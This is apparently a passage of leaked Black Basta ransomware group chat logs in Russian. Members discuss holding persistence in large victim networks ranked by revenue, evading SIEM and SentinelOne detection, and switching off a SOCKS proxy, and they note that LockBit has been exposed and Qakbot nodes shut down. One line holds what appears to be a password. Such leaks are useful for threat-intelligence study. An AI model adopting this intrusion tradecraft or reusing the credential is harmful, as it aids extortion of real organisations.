@usernamett:matrix.bestflowers247.online
`rcnehDSFvZwN6?GLwYzX`
2024-05-08 13:48:55
Black Basta
якреплю ее сейчас
2024-05-08 13:49:00
Black Basta
у меня есть другие креды
2024-05-08 13:49:07
Black Basta
но ставить я ее пока не буду
2024-05-08 13:49:16
Black Basta
отдыхать будем
2024-05-08 13:49:27
Black Basta
у нас до 13 каникулы в пн мы выходим
2024-05-08 13:49:37
@nickolas:talks.icu
умрет )
2024-05-08 13:49:56
Black Basta
у нес три сетки в закрепе сейчас
2024-05-08 13:50:05
Black Basta
4.5b
2024-05-08 13:50:08
Black Basta
500m
2024-05-08 13:50:27
Black Basta
и 29B вроде если не ошибаюсь
2024-05-08 13:50:35
Black Basta
твоя умрет ?
2024-05-08 13:50:53
@nickolas:talks.icu
Ну там же сием системы, увидят что делали, найду куда поставили.
2024-05-08 13:50:59
Black Basta
ничего там не делай
2024-05-08 13:51:01
Black Basta
не шуми
2024-05-08 13:51:04
Black Basta
ничего не умрет
2024-05-08 13:51:05
@nickolas:talks.icu
то есть я тебе сегодня сетки не даю ?
2024-05-08 13:51:13
@nickolas:talks.icu
Мне зачем что-то делать ?)
2024-05-08 13:51:24
Black Basta
там сентик стоит
2024-05-08 13:51:24
@nickolas:talks.icu
Я что похож на врага самому себе ?
2024-05-08 13:51:44
Black Basta
сегодня я не возьму уже ничего
2024-05-08 13:51:52
Black Basta
до пн
2024-05-08 13:51:55
Black Basta
9 мая брат
2024-05-08 13:51:57
Black Basta
отдыхать надо
2024-05-08 13:52:01
Black Basta
мясо пожарить
2024-05-08 13:52:09
@nickolas:talks.icu
окей. Ну у нас рабочие будни, до сб.
2024-05-08 13:52:30
@nickolas:talks.icu
поставили вы бы их, да шли отдыхать :)
2024-05-08 13:53:09
Black Basta
сегодня была очень большая сеть
2024-05-08 13:53:15
Black Basta
все уже планов настроили
2024-05-08 13:53:25
Black Basta
кто то билеты взял кто не отсюда
2024-05-08 13:53:34
@nickolas:talks.icu
эх, лады.. (
2024-05-08 13:53:40
Black Basta
как бы я не хотел но уже обещал им дать отдохнуть
2024-05-08 13:53:49
Black Basta
выебал и высышил их за эти 7 дней без отдыха
2024-05-08 13:53:58
Black Basta
очень устали
2024-05-08 13:54:01
Black Basta
я сам устал
2024-05-08 13:54:01
@nickolas:talks.icu
сетка просто юс и хорошая.
2024-05-08 13:54:15
Black Basta
да
2024-05-08 13:54:23
Black Basta
крплюсь
2024-05-08 13:54:27
Black Basta
никуда она не уйдет
2024-05-08 13:54:54
@nickolas:talks.icu
Ну аккуратно, отслеживание черзе сием, имеет отсроченный эффект
2024-05-08 13:55:10
@nickolas:talks.icu
На неделе тоже закрепились, а потом привет :-)
2024-05-08 13:55:18
@nickolas:talks.icu
Лады, хороших выходных, ждем вас!
2024-05-08 13:55:34
Black Basta
потуши сокс как я закончу закрпить ее
2024-05-08 13:55:55
@nickolas:talks.icu
Окей, отпишешь, потушимся.
2024-05-08 13:56:23
@nickolas:talks.icu
отойду на 30 минуток
2024-05-08 13:57:17
Black Basta
да
2024-05-08 14:00:14
@chuck:talks.icu
посмотрим, покаа и так неплохо
2024-05-08 14:01:27
@manager361:colorado.su
https://docs.google.com/spreadsheets/d/1q2gJP_gKIuns7VP-E-5IcRccuc6rPK3p3UajiSEDvr8/edit#gid=0
2024-05-08 14:01:32
@manager361:colorado.su
через 10 минут
2024-05-08 14:01:49
@manager361:colorado.su
Hello
2024-05-08 14:01:50
Black Basta
++
2024-05-08 14:02:06
Black Basta
локбита раскрыли
2024-05-08 14:02:06
@iamnurnazarov:matrix.org
принял
2024-05-08 14:02:25
Black Basta
ну думаю тебе ари уже скидывал скрины моей с ним переписки ?
2024-05-08 14:03:24
@chuck:talks.icu
да слышал(
2024-05-08 14:03:34
@chuck:talks.icu
я квака загасил ноды